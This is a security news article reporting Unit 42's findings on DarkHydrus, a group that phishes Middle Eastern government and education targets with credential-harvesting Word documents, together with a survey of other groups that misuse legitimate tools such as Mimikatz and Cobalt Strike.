A threat actor that is relatively new to the scene relies on open-source tools for spear-phishing attacks designed to steal credentials from government and educational institutions in the Middle East.
The group is being tracked as DarkHydrus by researchers at Palo Alto Networks Unit 42, who observed it using Phishery in a recent credential harvesting attack. Previous campaigns utilized Meterpreter, Cobalt Strike, Invoke-Obfuscation, Mimikatz, PowerShellEmpire, and Veil. The typical method employed is to weaponize Office documents that retrieves malicious code from a remote site when executed.
In an attack in June, DarkHydrus targeted an educational entity with an email carrying the subject line “Project Offer,” and had a Word document as the attachment. Once the Word document was launched, it prompted the user to enter their username and password in a an authentication prompt. If they did that, the credentials would be sent directly to the command and control server of the malicious actor.
All this would seem legitimate for an unwitting person, especially since the dialog box showed a connection to a fairly familiar domain.
"Firstly, the redacted subdomain was the domain of the targeted educational institution," the researchers say. "Also, the 0utl00k[.]net domain resembles Microsoft’s legitimate "outlook.com" domain that provides free email services, which also make the user less suspicious and more likely to enter their credentials,"
While the document used in this attack was empty and may raise suspicions, it is not the first time the group employs this technique. In late 2017, two different Word files using the same domain caught the attention of experts. Both of them showed content relevant to the target; one was an employee survey and the other a password handover form.
Abusing legitimate tools is not a new direction for threat actors. Last year’s WannaCry and NotPetya rapid propagation was due to Mimikatz, which was used to retrieve passwords, and PsExec, which was used for remote execution of commands on the affected systems.
If nothing else, using readily available utilities has turned into something of a trend. The infamous FIN7 bank-robbing group built their custom malware with Cobalt Strike threat emulation software.
SamSam crew operates with legitimate software and services, either present on the victim systems or publicly available. RDP (Remote Desktop Protocol) for offsite connection, and Hyena for remote administration of servers and workstation are just two of the tools employed by the cybercriminals.
Similarly, Leafminer relies on penetration testing software and public research to find emails, credentials, files and databases on the compromised systems in the Middle East area, too.